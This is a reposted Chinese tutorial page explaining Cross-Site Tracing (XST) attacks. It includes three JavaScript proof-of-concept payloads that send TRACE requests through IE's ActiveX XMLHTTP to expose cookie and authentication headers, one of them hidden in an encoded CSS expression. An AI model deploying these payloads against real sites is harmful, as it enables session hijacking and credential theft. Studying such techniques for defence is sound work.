当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 基础知识 XST攻击理论及手法讲解

安全基础
漏洞问题 RPC服务器安全配制
活用ftp自动上传文件至肉鸡
利用cmd躲过肉鸡防火墙方法
校园网方便的上网时段控制法
手把手教你穿透ADSL路由入侵内网
利用测试网站检测出你的浏览器安全级别
妙用你的hosts文件过滤插件和广告
个人隐私 你的系统文件保护好了吗
P2P中保障Windows网络安全的五大步骤
消除威胁 通过防火墙堵住VPN安全漏洞
天下无贼 两招解决IP地址盗用问题
DDoS防范和全局网络安全网络的应对
用Windows 2000安全审核让入侵者显形
宽带用户易被攻击 用户需注意七大方面
日志分析两部曲:充分利用日志保护网络
安全设置Windows组策略 有效阻止黑客
Win2000/XP中的自启动“后门”
小心 MSHTA漏洞为黑客大开远程控制之门
如何增强活动目录安全性的五个步骤
各种操作系统中密码文件的位置

安全基础 中的 基础知识 XST攻击理论及手法讲解


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 57 ::
收藏到网摘: n/a

  出处: 黑客防线

  XST攻击描述:

  攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

  XST攻击条件:

  1、需要目标web服务器允许Trace参数;
  2、需要一个用来插入XST代码的地方;
  3、目标站点存在跨域漏洞。

  XST与XSS的比较:

  相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。

  优点:可以绕过一般的http验证以及NTLM验证

  如何利用:

手法1:

<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");
xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);
xmlHttp&#46;send();
xmlDoc=xmlHttp&#46;responseText;
alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法2:

<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank&#46;htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin&#46;external;
openWin&#46;location&#46;href=\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\";
setTimeout(
function () {
//以下必须写在一行
otraceswords&#46;NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert(\"不用document&#46;cookie 显示站点wmjie&#46;51&#46;net/swords/ 的头信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法3:

<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"[url]http://http://www.tingh.com/[/url]\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"[url]http://wmjie.51.net/swords/[/url]\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">

  后记:研究阶段,希望能抛砖引玉,期望和您能够交流心得体会。